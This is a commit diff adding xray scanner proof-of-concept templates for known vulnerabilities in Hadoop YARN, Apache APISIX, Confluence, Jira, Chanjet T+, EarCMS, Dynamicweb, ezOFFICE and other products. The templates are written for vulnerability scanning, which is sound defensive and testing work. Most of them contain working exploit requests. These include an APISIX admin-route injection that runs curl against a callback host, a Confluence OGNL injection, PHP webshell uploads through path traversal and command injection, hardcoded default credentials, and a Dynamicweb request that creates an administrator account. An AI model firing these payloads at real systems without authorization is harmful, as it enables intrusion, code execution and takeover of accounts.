add xray

xray_pocs/apache-hadoop-yarn-unauth-rce.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-hadoop-yarn-rpc-rce
+binding: 99fdcd5c-4225-4a58-8554-aa482628f3f0
+manual: true
+detail:
+    author: For3stCo1d (https://github.com/For3stCo1d)
+    links:
+        - https://github.com/cckuailong/YarnRpcRCE
+    vulnerability:
+        id: CT-416480
+        level: critical
+    description: hadoop-yarn-rpc-rce
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /ws/v1/cluster/apps/new-application
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(b"application-id") && response.body.bcontains(b"memory")
+expression: r0()

xray_pocs/apache-hadoop-yarn-unauth.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-hadoop-yarn-unauthorized-access
+binding: f6e92b61-24c7-497a-8476-b7e01895c352
+manual: true
+detail:
+    links:
+        - https://xz.aliyun.com/t/6103
+    vulnerability:
+        id: CT-157873
+        level: critical
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /ws/v1/cluster/info
+        expression: response.body.bcontains(b"clusterInfo") && response.body.bcontains(b"resourceManagerVersion") && response.body.bcontains(b"hadoopBuildVersion")
+expression: r0()

xray_pocs/apisix-dashboard-cve-2022-24112-rce.yml

@@ -0,0 +1,50 @@
+name: poc-yaml-apisix-dashboard-cve-2022-24112-rce
+binding: 6a3fb562-3910-48b7-b4d9-df96093bc242
+manual: true
+detail:
+    author: Xz
+    links:
+        - https://www.openwall.com/lists/oss-security/2022/02/11/3
+        - https://twitter.com/sirifu4k1/status/1496043663704858625
+        - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+        - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+    vulnerability:
+        id: CT-386274
+        level: critical
+    description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+transport: http
+set:
+    r1: randomLowercase(25)
+    reverse: newReverse()
+    reverseDNS: reverse.domain
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /apisix/batch-requests
+            headers:
+                Content-Type: application/json
+            body: |
+                {
+                "headers":{
+                    "X-Real-IP":"127.0.0.1",
+                    "Content-Type":"application/json"
+                },
+                "timeout":1500,
+                "pipeline":[
+                    {
+                    "method":"PUT",
+                    "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
+                    "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{r1}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{reverseDNS}}'); return true end\"}"
+                    }
+                ]
+                }
+        expression: response.status == 200 && response.body.bcontains(b"\"reason\":\"OK\"") && response.body.bcontains(b"\"status\":200") && response.headers["Content-Type"].contains("text/plain")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /api/{{r1}}
+        expression: reverse.wait(5)
+expression: r0() && r1()

xray_pocs/atlassian-confluence-dologin-dfpass-cve-2022-26138.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-confluence-cve-2022-26138
+binding: 8cbb3704-d1b6-46ce-a5dd-6e77b3c77ff1
+manual: true
+detail:
+    author: z92g(https://github.com/z92g)
+    links:
+        - https://github.com/alcaparra/CVE-2022-26138
+    vulnerability:
+        id: CT-458955
+        level: critical
+transport: http
+set:
+    rand: randomLowercase(10)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /dologin.action
+            headers:
+                Content-Type: application/x-www-form-urlencoded
+            body: os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2F{{rand}}.action
+        expression: |
+            response.status == 302 && ("^" + request.url.scheme + "://" + request.url.host + "/" + rand + ".action$").matches(response.headers["Location"])
+expression: r0()

xray_pocs/atlassian-confluence-uri-ognl-rce-cve-2022-26134.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-confluence-cve-2022-26134-rce
+binding: ad11e1b0-1ddc-4184-b81a-e8b6306b8a2d
+manual: true
+detail:
+    author: Xz
+    links:
+        - http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL注入漏洞%20CVE-2022-26134.html
+    vulnerability:
+        id: CT-433592
+        level: critical
+    description: Confulence CVE-2022-26134 命令执行
+transport: http
+set:
+    randomHeader: randomLowercase(18)
+    randomValue: randomLowercase(18)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /${@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("{{randomHeader}}","{{randomValue}}")}/
+            headers:
+                Content-Type: application/x-www-form-urlencoded
+        expression: response.headers[randomHeader].contains(randomValue)
+expression: r0()

xray_pocs/atlassian-jira-idor-cve-2022-0540.yml

@@ -0,0 +1,20 @@
+name: poc-yaml-atlassian-jira-cve-2022-0540
+binding: 7a3203da-7c0a-4d83-b30e-75a583c0c437
+manual: true
+detail:
+    author: Xz
+    links:
+        - https://paper.seebug.org/1961/#_8
+    vulnerability:
+        id: CT-421252
+        level: critical
+    description: CVE-2022-0540 Jira 身份验证绕过漏洞
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /InsightPluginShowGeneralConfiguration.jspa;
+        expression: response.status == 200 && (response.body.bcontains(bytes("General Insight Configuration")) || response.body.bcontains(bytes("常规 Insight 配置")) || response.body.bcontains(bytes("一般 Insight 配置"))) && response.body_string.contains("onClick=\"window.location.href='InsightPluginUpdateGeneralConfiguration.jspa'\"")
+expression: r0()

xray_pocs/bt-uri-pma-unauth.yml

@@ -0,0 +1,20 @@
+name: poc-yaml-bt742-pma-unauthorized-access
+binding: 46465016-d494-4c5d-951e-164462fe539c
+manual: true
+detail:
+    author: Facker007(https://github.com/Facker007)
+    links:
+        - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A
+    vulnerability:
+        id: CT-157980
+        level: critical
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /pma/
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php")
+expression: r0()

xray_pocs/changjie-tplus-upload-writefile.yml

@@ -0,0 +1,33 @@
+name: poc-yaml-yonyou-chanjet-file-upload
+binding: e5c175f6-c1de-4b4b-83ea-096acfebf9dd
+manual: true
+detail:
+    author: Jarcis-cy
+    links:
+        - https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1
+    vulnerability:
+        id: CT-475791
+        level: critical
+    warning: 注意该脚本会上传文件产生一个临时的无害文件
+transport: http
+set:
+    randstr: randomLowercase(60)
+    rboundary: randomLowercase(8)
+    randname: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
+            headers:
+                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
+            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"File1\"; filename=\"../../../img/login/{{randname}}.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n{{randstr}}\r\n------WebKitFormBoundary{{rboundary}}--"
+        expression: response.status == 200
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /tplus/img/login/{{randname}}.jpg
+        expression: response.status == 200 && response.body.bcontains(bytes(randstr))
+expression: r0() && r1()

xray_pocs/chatlive-uploadimg-html-writefile.yml

@@ -0,0 +1,45 @@
+name: poc-yaml-php-chat-live-uploadimg-html-upload
+binding: 94e22f77-1d4a-4b0b-b18d-8818331c35d6
+manual: true
+detail:
+    author: sharecast
+    links:
+        - https://mp.weixin.qq.com/s/-LnDOjoqYMjtjoVV9l-EuA
+    vulnerability:
+        id: CT-416577
+        level: critical
+    warning: 该脚本会上传文件产生一个临时的无害文件，同时能够执行自删除逻辑，但是可能删除不成功
+transport: http
+set:
+    f1: randomInt(40000, 44800)
+    rboundary: randomLowercase(8)
+    randname: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /admin/event/uploadimg.html
+            follow_redirects: false
+        expression: response.status == 500 && response.body.bcontains(b"editormd-image-file")
+    r1:
+        request:
+            cache: true
+            method: POST
+            path: /admin/event/uploadimg.html
+            headers:
+                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
+            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{randname}}.jpg.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo md5({{f1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(b".php")
+        output:
+            search: '"url\":\"(?P<dir>.+?)\"".bsubmatch(response.body)'
+            dir: replaceAll(search["dir"], "\\", "")
+    r2:
+        request:
+            cache: true
+            method: GET
+            path: /{{dir}}
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(f1))))
+expression: r0() && r1() && r2()

xray_pocs/dynamicweb-unauth-rce-cve-2022-25369.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-dynamicweb-cve-2022-25369
+binding: be9db2ed-63b4-4202-9b7f-8a287741dcef
+manual: true
+detail:
+    author: 2husky
+    links:
+        - https://www.ddosi.org/cve-2022-25369/
+    vulnerability:
+        id: CT-437894
+        level: critical
+    warning: 该poc将会产生一个随机账号密码的账号，请注意删除
+transport: http
+set:
+    f1: string(randomInt(10000, 20000)) + randomLowercase(5)
+    f2: string(randomInt(10000, 20000)) + randomLowercase(5)
+    f3: string(randomInt(10000, 20000)) + randomLowercase(5)
+rules:
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{f1}}&adminpassword={{f2}}&adminemail={{f3}}@test.com&adminname=test
+            follow_redirects: false
+        expression: response.status == 200 && response.content_type.contains("json") && "\"[sS]+uccess\":\\s?true".bmatches(response.body) && response.headers["set-cookie"].contains("ASP.NET_SessionId")
+expression: r1()

xray_pocs/earcms-download-site-rce.yml

@@ -0,0 +1,31 @@
+name: poc-yaml-earcms-download-php-exec
+binding: c65f77bc-eeb1-464a-b2fb-7e5098be6dd3
+manual: true
+detail:
+    author: sharecast
+    links:
+        - https://zhuanlan.zhihu.com/p/81934322
+    vulnerability:
+        id: CT-416446
+        level: critical
+    warning: 该脚本会上传文件产生一个临时的无害文件，同时能够执行自删除逻辑，但是可能删除不成功
+transport: http
+set:
+    r1: randomInt(40000, 44800)
+    randname: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /source/pack/127.0.0.1/download.php?site=1%3Becho+%27%3C%3Fphp+echo+md5%28{{r1}}%29%3Bunlink%28__FILE__%29%3B%3F%3E%27+%3E+{{randname}}.php%3B
+            follow_redirects: false
+        expression: response.status == 200
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /source/pack/127.0.0.1/{{randname}}.php
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
+expression: r0() && r1()

xray_pocs/ecology-ofslogin-aul.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-ecology-ofslogin-aul
+transport: http
+rules:
+  kw_in_body:
+    request:
+      method: GET
+      path: /mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=
+    expression: response.body_string.contains("/login/Login.jsp") && response.body_string.contains("location.replace") && response.status == 200
+expression: kw_in_body()
+detail:
+  author: Chaitin
+  links:
+    - https://stack.chaitin.com/techblog/detail?id=90

xray_pocs/ezoffice-oa-officeserverservlet-writefile.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-wanhu-ezoffice-file-upload
+binding: 8e78f4bd-c71c-4c41-a712-24022381b092
+manual: true
+detail:
+    author: Aurora
+    links:
+        - https://github.com/onMey/WH/blob/main/poc.py
+    vulnerability:
+        id: CT-456739
+        level: critical
+    description: Whir ezOFFICE oa.The oa has a file upload vulnerability that allows direct control of the server.
+    extra:
+        dock: app="Whir-ezOFFICE"
+        homepage: http://www.whir.net/cn/mtbd/info_27_itemid_390.html
+        product: Whir ezOFFICE
+transport: http
+rules:
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /defaultroot/officeserverservlet
+            follow_redirects: false
+        expression: response.status == 200 && "DBSTEP\\s+[v|V]3.0\\s+\\d+\\s+\\d+(.*)".bmatches(response.body)
+expression: r1()